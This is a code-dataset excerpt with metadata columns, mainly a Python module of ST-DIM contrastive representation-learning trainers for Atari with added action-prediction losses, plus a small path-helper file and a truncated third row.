hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2e0b218dfc08afab61e86f9a1155c024db47e196
| 24,108
|
py
|
Python
|
atariari/methods/stdim.py
|
JKLee0717/atari-representation-learning
|
cc4e8e221c1d896bd47706ce15e095b8a85debbb
|
[
"MIT"
] | null | null | null |
atariari/methods/stdim.py
|
JKLee0717/atari-representation-learning
|
cc4e8e221c1d896bd47706ce15e095b8a85debbb
|
[
"MIT"
] | null | null | null |
atariari/methods/stdim.py
|
JKLee0717/atari-representation-learning
|
cc4e8e221c1d896bd47706ce15e095b8a85debbb
|
[
"MIT"
] | null | null | null |
import random
import torch
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from torch.utils.data import RandomSampler, BatchSampler
from .utils import calculate_accuracy, Cutout
from .trainer import Trainer
from .utils import EarlyStopping
from torchvision import transforms
import torchvision.transforms.functional as TF
from atariari.benchmark.envs import make_vec_envs # action space 불러오기
from atariari.methods.utils import get_argparser # action space 불러오기
############ Action space #############
# Parsed once at import time so every trainer class below can size its
# action-prediction head. A vectorized env is built solely to read
# `action_space.n` (the number of discrete Atari actions).
# NOTE(review): calling parse_args() on module import couples this module to
# the CLI of whichever script imports it — consider passing the action-space
# size through `config` instead.
parser = get_argparser()
args = parser.parse_args()
env_action_space_size = make_vec_envs(args.env_name, args.seed, args.num_processes, args.num_frame_stack, not args.no_downsample, args.color).action_space.n
#######################################
class Classifier(nn.Module):
    """Bilinear compatibility head: scores a pair of feature vectors.

    Computes ``score = x1^T W x2 + b`` with a single output unit, as used
    for InfoNCE-style positive/negative pair scoring.
    """

    def __init__(self, num_inputs1, num_inputs2):
        super().__init__()
        # One bilinear form mapping (num_inputs1, num_inputs2) -> scalar.
        self.network = nn.Bilinear(num_inputs1, num_inputs2, 1)

    def forward(self, x1, x2):
        score = self.network(x1, x2)
        return score
class InfoNCESpatioTemporalTrainer(Trainer):
    """ST-DIM trainer extended with an action-prediction (AFC) loss.

    Losses per batch:
      1. InfoNCE between the global feature at time t (``out``) and every
         ``f5`` spatial patch at time t-1, via ``classifier1``.
      2. InfoNCE between ``f5`` patches at time t and t-1, via ``classifier2``.
      3. MSE between a linear action prediction from the concatenated global
         features [f_t, f_{t-1}] and the one-hot encoded action, via
         ``classifier3``.

    The encoder is assumed to return a dict with keys 'out' and 'f5' when
    called with ``fmaps=True`` (see ``do_one_epoch``).
    """

    def __init__(self, encoder, config, device=torch.device('cpu'), wandb=None):
        super().__init__(encoder, wandb, device)
        self.config = config
        self.patience = self.config["patience"]
        # x1 = global, x2 = patch, n_channels = 32
        self.classifier1 = nn.Linear(self.encoder.hidden_size, self.encoder.local_layer_depth).to(device)
        self.classifier2 = nn.Linear(self.encoder.local_layer_depth, self.encoder.local_layer_depth).to(device)
        # Predicts the action from the concatenated global features.
        self.classifier3 = nn.Linear(self.encoder.hidden_size * 2, env_action_space_size).to(device)
        self.epochs = config['epochs']
        self.batch_size = config['batch_size']
        self.device = device
        self.optimizer = torch.optim.Adam(
            list(self.classifier1.parameters()) + list(self.encoder.parameters()) +
            list(self.classifier2.parameters()) + list(self.classifier3.parameters()),
            lr=config['lr'], eps=1e-5)
        self.early_stopper = EarlyStopping(patience=self.patience, verbose=False, wandb=self.wandb, name="encoder")
        self.transform = transforms.Compose([Cutout(n_holes=1, length=80)])

    def generate_batch(self, episodes, acts):
        """Yield (x_t, x_tprev, act_t) minibatches sampled across episodes.

        Frames are stacked and normalized to [0, 1]; the action tensor is
        returned as float (converted back to long by the caller).
        """
        total_steps = sum(len(e) for e in episodes)
        print('Total Steps: {}'.format(total_steps))
        # Sample episode indices with replacement; `self.batch_size` per batch.
        sampler = BatchSampler(RandomSampler(range(len(episodes)),
                                             replacement=True, num_samples=total_steps),
                               self.batch_size, drop_last=True)
        for indices in sampler:
            episodes_batch = [episodes[x] for x in indices]
            acts_batch = [acts[x] for x in indices]
            x_t, x_tprev, act_tprev = [], [], []
            for episode, act in zip(episodes_batch, acts_batch):
                # BUGFIX: sample t >= 1 so episode[t - 1] is a genuine previous
                # frame; previously t could be 0, silently pairing the first
                # frame with the *last* one (episode[-1]).
                t = np.random.randint(1, len(episode)) if len(episode) > 1 else 0
                x_t.append(episode[t])
                x_tprev.append(episode[t - 1])
                act_tprev.append(act[t])
            yield (torch.stack(x_t).float().to(self.device) / 255.,
                   torch.stack(x_tprev).float().to(self.device) / 255.,
                   torch.stack(act_tprev).float().to(self.device))

    def do_one_epoch(self, epoch, episodes, acts):
        """Run one pass over the data; train or validate based on module mode."""
        mode = "train" if self.encoder.training and self.classifier1.training else "val"
        epoch_loss, steps = 0., 0
        epoch_loss1, epoch_loss2 = 0., 0.
        data_generator = self.generate_batch(episodes, acts)
        for x_t, x_tprev, act_tprev in data_generator:
            f_t_maps, f_t_prev_maps = self.encoder(x_t, fmaps=True), self.encoder(x_tprev, fmaps=True)
            # Loss 1: global feature at time t vs f5 patches at time t-1.
            f_t, f_t_prev = f_t_maps['out'], f_t_prev_maps['f5']
            sy = f_t_prev.size(1)
            sx = f_t_prev.size(2)
            N = f_t.size(0)
            loss1 = 0.
            for y in range(sy):
                for x in range(sx):
                    predictions = self.classifier1(f_t)
                    positive = f_t_prev[:, y, x, :]
                    # In-batch InfoNCE: diagonal entries are the positives.
                    logits = torch.matmul(predictions, positive.t())
                    step_loss = F.cross_entropy(logits, torch.arange(N).to(self.device))
                    loss1 += step_loss
            loss1 = loss1 / (sx * sy)
            # Loss 2: f5 patches at time t vs f5 patches at time t-1.
            f_t = f_t_maps['f5']
            loss2 = 0.
            for y in range(sy):
                for x in range(sx):
                    predictions = self.classifier2(f_t[:, y, x, :])
                    positive = f_t_prev[:, y, x, :]
                    logits = torch.matmul(predictions, positive.t())
                    step_loss = F.cross_entropy(logits, torch.arange(N).to(self.device))
                    loss2 += step_loss
            loss2 = loss2 / (sx * sy)
            ######## Loss 3: ABST-DIM AFC ##########
            # Predict the action from the concatenated global features.
            f_t_out, f_t_prev_out = f_t_maps['out'], f_t_prev_maps['out']
            joint = torch.cat([f_t_out, f_t_prev_out], dim=1)
            net_out = self.classifier3(joint)
            act_tprev = act_tprev.to(torch.long)
            actions_one_hot = torch.squeeze(F.one_hot(act_tprev, env_action_space_size)).float()
            loss3 = nn.MSELoss()(net_out, actions_one_hot)
            loss = loss1 + loss2 + loss3
            ##############################################
            if mode == "train":
                self.optimizer.zero_grad()
                loss.backward()
                self.optimizer.step()
            epoch_loss += loss.detach().item()
            epoch_loss1 += loss1.detach().item()
            epoch_loss2 += loss2.detach().item()
            steps += 1
        self.log_results(epoch, epoch_loss1 / steps, epoch_loss2 / steps, epoch_loss / steps, prefix=mode)
        if mode == "val":
            # EarlyStopping expects a score to maximize, hence the negation.
            self.early_stopper(-epoch_loss / steps, self.encoder)

    def train(self, tr_eps, val_eps, tr_acts, val_acts):
        """Alternate train/val epochs until `epochs` or early stopping, then save."""
        # TODO: Make it work for all modes, right now only it defaults to pcl.
        for e in range(self.epochs):
            self.encoder.train(), self.classifier1.train(), self.classifier2.train(), self.classifier3.train()
            self.do_one_epoch(e, tr_eps, tr_acts)
            self.encoder.eval(), self.classifier1.eval(), self.classifier2.eval(), self.classifier3.eval()
            self.do_one_epoch(e, val_eps, val_acts)
            if self.early_stopper.early_stop:
                break
        torch.save(self.encoder.state_dict(), os.path.join(self.wandb.run.dir, self.config['env_name'] + '.pt'))

    def log_results(self, epoch_idx, epoch_loss1, epoch_loss2, epoch_loss, prefix=""):
        """Print and push per-epoch losses to wandb (commit deferred)."""
        print("{} Epoch: {}, Epoch Loss: {}, {}".format(prefix.capitalize(), epoch_idx, epoch_loss,
                                                        prefix.capitalize()))
        self.wandb.log({prefix + '_loss': epoch_loss,
                        prefix + '_loss1': epoch_loss1,
                        prefix + '_loss2': epoch_loss2}, step=epoch_idx, commit=False)
class Flatten(nn.Module):
    """Collapse every dimension after the batch dimension into one."""

    def forward(self, x):
        flattened = x.view(x.size(0), -1)
        return flattened
class Region_Sensitive_Module(nn.Module):
    """Produce two sigmoid attention maps over the spatial grid of a feature map.

    Two stacked 1x1 convolutions (num_inputs -> 512 -> 2) followed by a
    sigmoid; output shape is (batch, 2, H, W) with values in (0, 1).
    """

    def __init__(self, num_inputs):
        super().__init__()
        self.conv1_attent = nn.Conv2d(num_inputs, 512, 1)
        self.conv2_attent = nn.Conv2d(512, 2, 1)

    def forward(self, inputs):
        hidden = F.elu(self.conv1_attent(inputs))
        raw = self.conv2_attent(hidden)  # (batch, 2, H, W)
        attention = torch.sigmoid(raw)
        return attention
class Action_Classifier(nn.Module):
    """Predict an action from two convolutional feature maps (t and t-1).

    Each map is passed through a shared ReLU -> Flatten -> Linear(_, 256)
    tail; the two 256-d embeddings are concatenated and linearly mapped to
    the environment's action-space size.
    """

    def __init__(self, encoder):
        super().__init__()
        # NOTE(review): `encoder` is accepted but never stored or used here.
        # assumes input maps flatten to 64 * 9 * 6 elements — TODO confirm
        self.final_conv_size = 64 * 9 * 6
        self.tail = nn.Sequential(
            nn.ReLU(),
            Flatten(),
            nn.Linear(self.final_conv_size, 256),
        )
        self.linear2 = nn.Linear(256*2, env_action_space_size)

    def forward(self, x1, x2):
        # Shared tail embeds each frame's feature map to a 256-d vector.
        emb1 = self.tail(x1)
        emb2 = self.tail(x2)
        combined = torch.cat([emb1, emb2], dim=1)  # (batch, 512)
        return self.linear2(combined)
class InfoNCESpatioTemporalTrainer_ARSM(Trainer):
    """ST-DIM trainer with a region-sensitive (ARSM) action-prediction loss.

    Losses 1 and 2 are the standard ST-DIM InfoNCE terms (see
    InfoNCESpatioTemporalTrainer). Loss 3 re-weights the ``f7`` feature maps
    of both frames with two attention maps from Region_Sensitive_Module,
    then predicts the action with Action_Classifier and applies MSE against
    the one-hot action.

    The encoder is assumed to return a dict with keys 'out', 'f5' and 'f7'
    when called with ``fmaps=True`` (see ``do_one_epoch``).
    """

    def __init__(self, encoder, config, device=torch.device('cpu'), wandb=None):
        super().__init__(encoder, wandb, device)
        self.config = config
        self.patience = self.config["patience"]
        # x1 = global, x2 = patch, n_channels = 32
        self.classifier1 = nn.Linear(self.encoder.hidden_size, self.encoder.local_layer_depth).to(device)
        self.classifier2 = nn.Linear(self.encoder.local_layer_depth, self.encoder.local_layer_depth).to(device)
        self.classifier3 = Action_Classifier(encoder).to(device)
        self.Region_Sensitive_Module = Region_Sensitive_Module(num_inputs=64).to(device)
        # Mixing weight for the action loss; currently unused (kept for
        # backward compatibility with configs that reference it).
        self._lambda = 0.5
        self.epochs = config['epochs']
        self.batch_size = config['batch_size']
        self.device = device
        self.optimizer = torch.optim.Adam(
            list(self.classifier1.parameters()) + list(self.encoder.parameters()) +
            list(self.classifier2.parameters()) + list(self.classifier3.parameters()) +
            list(self.Region_Sensitive_Module.parameters()),
            lr=config['lr'], eps=1e-5)
        self.early_stopper = EarlyStopping(patience=self.patience, verbose=False, wandb=self.wandb, name="encoder")
        self.transform = transforms.Compose([Cutout(n_holes=1, length=80)])

    def generate_batch(self, episodes, acts):
        """Yield (x_t, x_tprev, act_t) minibatches sampled across episodes.

        Frames are stacked and normalized to [0, 1]; the action tensor is
        returned as float (converted back to long by the caller).
        """
        total_steps = sum(len(e) for e in episodes)
        print('Total Steps: {}'.format(total_steps))
        # Sample episode indices with replacement; `self.batch_size` per batch.
        sampler = BatchSampler(RandomSampler(range(len(episodes)),
                                             replacement=True, num_samples=total_steps),
                               self.batch_size, drop_last=True)
        for indices in sampler:
            episodes_batch = [episodes[x] for x in indices]
            acts_batch = [acts[x] for x in indices]
            x_t, x_tprev, act_tprev = [], [], []
            for episode, act in zip(episodes_batch, acts_batch):
                # BUGFIX: sample t >= 1 so episode[t - 1] is a genuine previous
                # frame; previously t could be 0, silently pairing the first
                # frame with the *last* one (episode[-1]).
                t = np.random.randint(1, len(episode)) if len(episode) > 1 else 0
                x_t.append(episode[t])
                x_tprev.append(episode[t - 1])
                act_tprev.append(act[t])
            yield (torch.stack(x_t).float().to(self.device) / 255.,
                   torch.stack(x_tprev).float().to(self.device) / 255.,
                   torch.stack(act_tprev).float().to(self.device))

    def do_one_epoch(self, epoch, episodes, acts):
        """Run one pass over the data; train or validate based on module mode."""
        mode = "train" if self.encoder.training and self.classifier1.training else "val"
        epoch_loss, steps = 0., 0
        epoch_loss1, epoch_loss2 = 0., 0.
        data_generator = self.generate_batch(episodes, acts)
        for x_t, x_tprev, act_tprev in data_generator:
            f_t_maps, f_t_prev_maps = self.encoder(x_t, fmaps=True), self.encoder(x_tprev, fmaps=True)
            # Loss 1: global feature at time t vs f5 patches at time t-1.
            f_t, f_t_prev = f_t_maps['out'], f_t_prev_maps['f5']
            sy = f_t_prev.size(1)
            sx = f_t_prev.size(2)
            N = f_t.size(0)
            loss1 = 0.
            for y in range(sy):
                for x in range(sx):
                    predictions = self.classifier1(f_t)
                    positive = f_t_prev[:, y, x, :]
                    # In-batch InfoNCE: diagonal entries are the positives.
                    logits = torch.matmul(predictions, positive.t())
                    step_loss = F.cross_entropy(logits, torch.arange(N).to(self.device))
                    loss1 += step_loss
            loss1 = loss1 / (sx * sy)
            # Loss 2: f5 patches at time t vs f5 patches at time t-1.
            f_t = f_t_maps['f5']
            loss2 = 0.
            for y in range(sy):
                for x in range(sx):
                    predictions = self.classifier2(f_t[:, y, x, :])
                    positive = f_t_prev[:, y, x, :]
                    logits = torch.matmul(predictions, positive.t())
                    step_loss = F.cross_entropy(logits, torch.arange(N).to(self.device))
                    loss2 += step_loss
            loss2 = loss2 / (sx * sy)
            ######## Loss 3: ABST-DIM ARSM ##########
            # Move f7 maps to channels-first layout for the conv attention.
            f_t_out = f_t_maps['f7'].permute(0, 3, 1, 2)
            f_t_prev_out = f_t_prev_maps['f7'].permute(0, 3, 1, 2)
            f_t_RS_weight = self.Region_Sensitive_Module(f_t_out)
            f_t_prev_RS_weight = self.Region_Sensitive_Module(f_t_prev_out)
            # Broadcast each of the two attention maps over channels, then sum.
            f_t_out = (f_t_out * f_t_RS_weight[:, :1, :, :] +
                       f_t_out * f_t_RS_weight[:, 1:, :, :])
            f_t_prev_out = (f_t_prev_out * f_t_prev_RS_weight[:, :1, :, :] +
                            f_t_prev_out * f_t_prev_RS_weight[:, 1:, :, :])
            # Action prediction from the two attended maps.
            net_out = self.classifier3(f_t_out, f_t_prev_out)
            act_tprev = act_tprev.to(torch.long)
            actions_one_hot = torch.squeeze(F.one_hot(act_tprev, env_action_space_size)).float()
            loss3 = nn.MSELoss()(net_out, actions_one_hot)
            loss = loss1 + loss2 + loss3
            ##############################################
            if mode == "train":
                self.optimizer.zero_grad()
                loss.backward()
                self.optimizer.step()
            epoch_loss += loss.detach().item()
            epoch_loss1 += loss1.detach().item()
            epoch_loss2 += loss2.detach().item()
            steps += 1
        self.log_results(epoch, epoch_loss1 / steps, epoch_loss2 / steps, epoch_loss / steps, prefix=mode)
        if mode == "val":
            # EarlyStopping expects a score to maximize, hence the negation.
            self.early_stopper(-epoch_loss / steps, self.encoder)

    def train(self, tr_eps, val_eps, tr_acts, val_acts):
        """Alternate train/val epochs until `epochs` or early stopping, then save."""
        # TODO: Make it work for all modes, right now only it defaults to pcl.
        for e in range(self.epochs):
            self.encoder.train(), self.classifier1.train(), self.classifier2.train(), self.classifier3.train(), self.Region_Sensitive_Module.train()
            self.do_one_epoch(e, tr_eps, tr_acts)
            self.encoder.eval(), self.classifier1.eval(), self.classifier2.eval(), self.classifier3.eval(), self.Region_Sensitive_Module.eval()
            self.do_one_epoch(e, val_eps, val_acts)
            if self.early_stopper.early_stop:
                break
        torch.save(self.encoder.state_dict(), os.path.join(self.wandb.run.dir, self.config['env_name'] + '.pt'))

    def log_results(self, epoch_idx, epoch_loss1, epoch_loss2, epoch_loss, prefix=""):
        """Print and push per-epoch losses to wandb (commit deferred)."""
        print("{} Epoch: {}, Epoch Loss: {}, {}".format(prefix.capitalize(), epoch_idx, epoch_loss,
                                                        prefix.capitalize()))
        self.wandb.log({prefix + '_loss': epoch_loss,
                        prefix + '_loss1': epoch_loss1,
                        prefix + '_loss2': epoch_loss2}, step=epoch_idx, commit=False)
class InfoNCESpatioTemporalTrainer_AMM(Trainer):
    """ST-DIM trainer with a linear action-matching (AMM) loss.

    Losses 1 and 2 are the standard ST-DIM InfoNCE terms. Loss 3 concatenates
    the two global features [f_t, f_{t-1}] and maps them through a single
    Linear(256*2, n_actions) to an action prediction, trained with MSE
    against the one-hot action.
    """

    def __init__(self, encoder, config, device=torch.device('cpu'), wandb=None):
        super().__init__(encoder, wandb, device)
        self.config = config
        self.patience = self.config["patience"]
        # x1 = global, x2 = patch, n_channels = 32
        self.classifier1 = nn.Linear(self.encoder.hidden_size, self.encoder.local_layer_depth).to(device)
        self.classifier2 = nn.Linear(self.encoder.local_layer_depth, self.encoder.local_layer_depth).to(device)
        # NOTE(review): input size is hard-coded to 256*2, so this assumes
        # encoder.hidden_size == 256 — confirm, or derive from the encoder as
        # the sibling trainer does.
        self.classifier3 = nn.Linear(256*2, env_action_space_size).to(device)
        # Mixing weight for the action loss; currently unused (kept for
        # backward compatibility with configs that reference it).
        self._lambda = 0.5
        self.epochs = config['epochs']
        self.batch_size = config['batch_size']
        self.device = device
        self.optimizer = torch.optim.Adam(
            list(self.classifier1.parameters()) + list(self.encoder.parameters()) +
            list(self.classifier2.parameters()) + list(self.classifier3.parameters()),
            lr=config['lr'], eps=1e-5)
        self.early_stopper = EarlyStopping(patience=self.patience, verbose=False, wandb=self.wandb, name="encoder")
        self.transform = transforms.Compose([Cutout(n_holes=1, length=80)])

    def generate_batch(self, episodes, acts):
        """Yield (x_t, x_tprev, act_t) minibatches sampled across episodes.

        Frames are stacked and normalized to [0, 1]; the action tensor is
        returned as float (converted back to long by the caller).
        """
        total_steps = sum(len(e) for e in episodes)
        print('Total Steps: {}'.format(total_steps))
        # Sample episode indices with replacement; `self.batch_size` per batch.
        sampler = BatchSampler(RandomSampler(range(len(episodes)),
                                             replacement=True, num_samples=total_steps),
                               self.batch_size, drop_last=True)
        for indices in sampler:
            episodes_batch = [episodes[x] for x in indices]
            acts_batch = [acts[x] for x in indices]
            x_t, x_tprev, act_tprev = [], [], []
            for episode, act in zip(episodes_batch, acts_batch):
                # BUGFIX: sample t >= 1 so episode[t - 1] is a genuine previous
                # frame; previously t could be 0, silently pairing the first
                # frame with the *last* one (episode[-1]).
                t = np.random.randint(1, len(episode)) if len(episode) > 1 else 0
                x_t.append(episode[t])
                x_tprev.append(episode[t - 1])
                act_tprev.append(act[t])
            yield (torch.stack(x_t).float().to(self.device) / 255.,
                   torch.stack(x_tprev).float().to(self.device) / 255.,
                   torch.stack(act_tprev).float().to(self.device))

    def do_one_epoch(self, epoch, episodes, acts):
        """Run one pass over the data; train or validate based on module mode."""
        mode = "train" if self.encoder.training and self.classifier1.training else "val"
        epoch_loss, steps = 0., 0
        epoch_loss1, epoch_loss2 = 0., 0.
        data_generator = self.generate_batch(episodes, acts)
        for x_t, x_tprev, act_tprev in data_generator:
            f_t_maps, f_t_prev_maps = self.encoder(x_t, fmaps=True), self.encoder(x_tprev, fmaps=True)
            # Loss 1: global feature at time t vs f5 patches at time t-1.
            f_t, f_t_prev = f_t_maps['out'], f_t_prev_maps['f5']
            sy = f_t_prev.size(1)
            sx = f_t_prev.size(2)
            N = f_t.size(0)
            loss1 = 0.
            for y in range(sy):
                for x in range(sx):
                    predictions = self.classifier1(f_t)
                    positive = f_t_prev[:, y, x, :]
                    # In-batch InfoNCE: diagonal entries are the positives.
                    logits = torch.matmul(predictions, positive.t())
                    step_loss = F.cross_entropy(logits, torch.arange(N).to(self.device))
                    loss1 += step_loss
            loss1 = loss1 / (sx * sy)
            # Loss 2: f5 patches at time t vs f5 patches at time t-1.
            f_t = f_t_maps['f5']
            loss2 = 0.
            for y in range(sy):
                for x in range(sx):
                    predictions = self.classifier2(f_t[:, y, x, :])
                    positive = f_t_prev[:, y, x, :]
                    logits = torch.matmul(predictions, positive.t())
                    step_loss = F.cross_entropy(logits, torch.arange(N).to(self.device))
                    loss2 += step_loss
            loss2 = loss2 / (sx * sy)
            ######## Loss 3: ABST-DIM AMM ##########
            # Predict the action from the concatenated global features.
            f_t_out, f_t_prev_out = f_t_maps['out'], f_t_prev_maps['out']
            joint = torch.cat([f_t_out, f_t_prev_out], dim=1)
            net_out = self.classifier3(joint)
            act_tprev = act_tprev.to(torch.long)
            actions_one_hot = torch.squeeze(F.one_hot(act_tprev, env_action_space_size)).float()
            loss3 = nn.MSELoss()(net_out, actions_one_hot)
            loss = loss1 + loss2 + loss3
            ##############################################
            if mode == "train":
                self.optimizer.zero_grad()
                loss.backward()
                self.optimizer.step()
            epoch_loss += loss.detach().item()
            epoch_loss1 += loss1.detach().item()
            epoch_loss2 += loss2.detach().item()
            steps += 1
        self.log_results(epoch, epoch_loss1 / steps, epoch_loss2 / steps, epoch_loss / steps, prefix=mode)
        if mode == "val":
            # EarlyStopping expects a score to maximize, hence the negation.
            self.early_stopper(-epoch_loss / steps, self.encoder)

    def train(self, tr_eps, val_eps, tr_acts, val_acts):
        """Alternate train/val epochs until `epochs` or early stopping, then save."""
        # TODO: Make it work for all modes, right now only it defaults to pcl.
        for e in range(self.epochs):
            self.encoder.train(), self.classifier1.train(), self.classifier2.train(), self.classifier3.train()
            self.do_one_epoch(e, tr_eps, tr_acts)
            self.encoder.eval(), self.classifier1.eval(), self.classifier2.eval(), self.classifier3.eval()
            self.do_one_epoch(e, val_eps, val_acts)
            if self.early_stopper.early_stop:
                break
        torch.save(self.encoder.state_dict(), os.path.join(self.wandb.run.dir, self.config['env_name'] + '.pt'))

    def log_results(self, epoch_idx, epoch_loss1, epoch_loss2, epoch_loss, prefix=""):
        """Print and push per-epoch losses to wandb (commit deferred)."""
        print("{} Epoch: {}, Epoch Loss: {}, {}".format(prefix.capitalize(), epoch_idx, epoch_loss,
                                                        prefix.capitalize()))
        self.wandb.log({prefix + '_loss': epoch_loss,
                        prefix + '_loss1': epoch_loss1,
                        prefix + '_loss2': epoch_loss2}, step=epoch_idx, commit=False)
| 49.707216
| 167
| 0.570806
| 3,088
| 24,108
| 4.242552
| 0.089702
| 0.013587
| 0.019693
| 0.009618
| 0.869781
| 0.863217
| 0.849019
| 0.841462
| 0.835432
| 0.835432
| 0
| 0.025813
| 0.296167
| 24,108
| 484
| 168
| 49.809917
| 0.746287
| 0.104364
| 0
| 0.808864
| 0
| 0
| 0.019647
| 0
| 0
| 0
| 0
| 0.002066
| 0
| 1
| 0.060942
| false
| 0
| 0.041551
| 0.00554
| 0.132964
| 0.016621
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2e43f0834a5acd142a51781fd6edb741b90d526a
| 85
|
py
|
Python
|
src/ewaluacja2021/tests/utils.py
|
iplweb/django-bpp
|
85f183a99d8d5027ae4772efac1e4a9f21675849
|
[
"BSD-3-Clause"
] | 1
|
2017-04-27T19:50:02.000Z
|
2017-04-27T19:50:02.000Z
|
src/ewaluacja2021/tests/utils.py
|
mpasternak/django-bpp
|
434338821d5ad1aaee598f6327151aba0af66f5e
|
[
"BSD-3-Clause"
] | null | null | null |
src/ewaluacja2021/tests/utils.py
|
mpasternak/django-bpp
|
434338821d5ad1aaee598f6327151aba0af66f5e
|
[
"BSD-3-Clause"
] | null | null | null |
import os
def curdir(fn, name):
    """Return the path of `fn` placed in the same directory as the file `name`."""
    directory = os.path.dirname(name)
    return os.path.join(directory, fn)
| 14.166667
| 50
| 0.682353
| 15
| 85
| 3.866667
| 0.666667
| 0.206897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164706
| 85
| 5
| 51
| 17
| 0.816901
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
2e4c24f1e5fc3f96f33d7d3d6fb7f108be654055
| 181
|
py
|
Python
|
cmft/__init__.py
|
dryobates/commit-message-from-test
|
41b4aa022f9432e6447e297b928d694835dc6495
|
[
"MIT"
] | null | null | null |
cmft/__init__.py
|
